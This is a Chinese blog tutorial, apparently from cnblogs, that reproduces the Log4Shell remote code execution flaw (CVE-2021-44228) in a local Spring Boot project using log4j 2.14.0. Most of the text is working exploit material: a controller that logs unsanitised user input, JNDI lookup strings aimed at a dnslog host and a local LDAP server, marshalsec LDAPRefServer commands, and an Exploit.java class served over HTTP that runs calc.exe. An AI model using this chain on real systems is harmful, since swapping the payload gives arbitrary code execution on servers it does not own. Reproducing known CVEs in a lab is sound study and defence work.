环境:jdk1.8.0_121,win11.log4j2.14.0
1.idea新建spring boot web项目并引入依赖
idea安装:1.微信公众号软件管家。2.自行百度
新建spring boot web项目。自行百度
引入如下依赖。分别为log4j-core,log4j-api
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<!-- 排除掉logging,不使用logback,改用log4j2 -->
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
新建HelloControllerTest,测试springboot项目是否创建成功。
创建好后启动springboot项目访问localhost:8080/hello测试
package com.example.controller;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;
@EnableAutoConfiguration
@RestController
public class HelloControllerTest {
@GetMapping("/hello")
public String hello(){
return "hello";
}
}
新建Log4jController测试lookup机制是否触发解析${}
package com.example.controller;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.context.annotation.ImportResource;
import javax.naming.NamingException;
import java.io.IOException;
public class Log4jController {
private static final Logger logger = LogManager.getLogger(Log4jController.class);
public static void main(String... args) throws IOException, NamingException {
logger.error("${java:version}");
logger.error("${java:vm}");
logger.error("${java:runtime}");
logger.error("${jndi:ldap://1ez6ai.dnslog.cn/hello}");
logger.error("${java:hw}");
logger.error("${java:os}");
}
}
新建HelloController,漏洞测试利用
package com.example.controller;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;
@RestController//
@EnableAutoConfiguration//自动装配
public class HelloController {
private static final Logger mLogger = LogManager.getLogger(HelloController.class);
@GetMapping (value="/log4j_inject")
@ResponseBody
public String log4j_inject(){
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
mLogger.error("${jndi:ldap://127.0.0.1:8081/#Exploit}");
//mLogger.error("${java:os}");//打印当前os信息
// mLogger.error("${jndi:ldap://wmxh8n.dnslog.cn/xxx}");//dnslog测试
return "hello,log4j2";
}
@RequestMapping(value = "/test", method = RequestMethod.GET)
@ResponseBody
public String log4j_test01(@RequestParam(value = "username")String username)
{
mLogger.error(username);
return "this_is_test";
}
}
HelloController测试结果如下。
Log4jController测试结果如下,打印出了相关信息。
漏洞利用
需先搭建黑客服务器,
1.github下载marshalsec-master并在解压目录下执行
mvn clean package -DskipTests //需联网 //需有maven并配置环境变量
执行后结果
2.漏洞利用程序准备Exploit.java
public class Exploit {
public Exploit(){
try{
String[] commands = {"calc.exe"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv) {
Exploit e = new Exploit();
}
}
3.使用java1.8.0_121的javac编译该文件会在当前目录生成class文件
javac Exploit.java
在含有exploit.java目录开启http服务,使用python httpserver
python3 -m http.server 8800
在以下目录使用指定端口开启服务,即刚mvn出来的那个目录。
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "127.0.0.1:8800/#Exploit" 8081
4.服务开启后,重新运行。
访问localhost:8080/log4j_inject计算机弹出
标签:java,error,springframework,44228log4j2RCE,2021,import,org,CVE,log4j From: https://www.cnblogs.com/jdslf/p/16867029.html